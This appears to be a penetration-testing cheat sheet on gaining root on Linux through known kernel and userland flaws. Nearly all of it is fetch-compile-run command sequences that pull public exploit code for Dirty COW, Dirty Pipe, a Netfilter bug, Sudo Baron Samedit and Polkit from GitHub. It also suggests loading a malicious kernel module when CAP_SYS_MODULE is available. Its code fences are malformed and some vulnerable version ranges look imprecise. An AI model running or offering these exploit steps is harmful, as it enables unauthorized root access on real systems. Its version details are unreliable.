Low Level Exploits

Check Kernel Version for Known CVEs

uname -r
    ```
Example vulnerable ranges:

- **Dirty COW** (CVE-2016-5195): Linux ≤ 4.8
- **Dirty Pipe** (CVE-2022-0847): Linux 5.8+ < 5.10.102 / < 5.15.25 / < 5.17.9
- **Other kernel 0-days**: search on [Exploit-DB](https://www.exploit-db.com/), [CVE Details](https://www.cvedetails.com/), or use `searchsploit`.
**Dirty Cow**
```bash
wget https://raw.githubusercontent.com/dirtycow/dirtycow/master/dirtyc0w.c
gcc dirtyc0w.c -o dirtycow
./dirtycow

Dirty Pipe

git clone https://github.com/ashishb/dirtypipe.git
cd dirtypipe
gcc dirtypipe.c -o dirtypipe
./dirtypipe

CVE-2022-27666 (Netfilter Privilege Escalation)

git clone https://github.com/niklasb/CVE-2022-27666.git
cd CVE-2022-27666
make
./cve-2022-27666

CVE-2021-3156 (Sudo “Baron Samedit”) (≤ 1.8.31p2) is vulnerable

git clone https://github.com/blasty/CVE-2021-3156.git
cd CVE-2021-3156
gcc cve-2021-3156.c -o exploit
./exploit

CVE-2021-3560 (Polkit)

git clone https://github.com/berdav/CVE-2021-3560.git
cd CVE-2021-3560
gcc cve-2021-3560.c -o exploit
./exploit

Check and load kernel Modules

lsmod                # list loaded modules
sudo modprobe tun    # check if tun module can be loaded

- If you have CAP_SYS_MODULE, you can compile and load a malicious kernel module to gain root. -